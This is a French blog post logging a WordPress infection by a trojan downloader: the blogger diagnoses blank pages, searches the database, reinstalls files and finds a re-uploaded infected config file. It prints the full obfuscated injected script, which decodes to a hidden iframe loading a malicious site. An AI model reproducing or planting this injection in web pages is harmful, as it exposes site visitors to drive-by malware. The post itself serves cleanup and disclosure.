WordPress – trojan : http://www.wp-stats-php.info/iframe/wp-stats.php

Encore un problème sur un de mes blogs sous WordPress. Voici le message de Kaperski qui s’affiche sur une page blanche :

découvert : cheval de Troie Trojan-Downloader.HTML.Agent.is URL: http://www.wp-stats-php.info/iframe/wp-stats.php

Pour l’instant Kaperski bloque aussi l’accès à l’interface d’administration de mon site. et Google n’est pas encore mon amis.

La suite plus tard dans la soiréee…

Point intermédiaire #2.

En désactivant mon antivirus j’arrive à trouver cette ligne dans l’entête des pages blanches de mon site :

Extrait:

<script type="text/javascript"><!--
function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return</p-->
</script>

Je désactive le javascript dans mon navigateur et j’atteins ensuite mon site, la page blanche a disparue.
Quand je le logue sur monsite/wp-admin, voilà un extrait du message d’erreur qui m’attend :
Warning: Cannot modify header information - headers already sent by (output started at /homepages/monsite/wp-includes/compat.php:100) in /homepages/14/d177545146/htdocs/monsite/wp-includes/pluggable.php on line 694

Point intermédiaire #3

J’ai fait une installation fraiche de tous les programmes (sauf la base de données) et j’ai toujours la même page blanche quand j’active le javascript.

J’ai trouvé une discussion récente en anglais sur ce sujet mais pour l’instant, pas de solution de ce côté là non plus…

J’ai recherché aussi dans la base de données pour voir si ce sont les articles qui contiennent l’appel de l’iframe. La requête donnée par cui dans les commentaires de ce cas précédent :

SELECT * FROM wptuto_posts WHERE post_content like '%IFRAME%' ;

Point #4.

Ça fait maintenant presque 24H que mes sites sont réduits à des pages blanches. La conversation repérée ici n’a pas beaucoup avancé mais en la relisant mon idée de la nuit est confirmée.

  • 2 participants ont le même problème mais n’ont qu’un plugin en commun : Akismet
  • Toutes sortes d’applications sont infectées (des programme maison, joomla…)
  • Le système vient loger son script dans la première ligne des pages.

Il s’agit donc très probablement d’un problème du coté du serveur de mon hébergeur (1&1). Dans ce cas il n’y a rien d’autre à faire que d’attendre et de partie en Week end loin des ordinateurs.

J’envoie un courriel à mon hébergeur lui reportant le problème.

Point #5

J’ai cru trouver la solution en relisant calmement le premier message de cette discussion. J’ai bien trouvé que mes fichiers de thèmes étaient modifiés avec le code associé à la fin des fichiers.

Code :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Je me suis dit que j’avais peut-être remis sur le serveur des fichiers vérolés et j’ai réinstallé les fichiers de mon thème à partir d’une sauvegarde saine.

Mon problème est que ça n’y change rien.

Point #6.

Je suis à la bourre. Après mon « fresh install » j’avais remis un fichier config.php vérolé. C’est vraiment idiot.

Autre astuce découverte : dans Google Webmaster Tools, il faut que le javascript soit activié pour faire une demande de réinclusion.


Tags :
Commentaires
Réagissez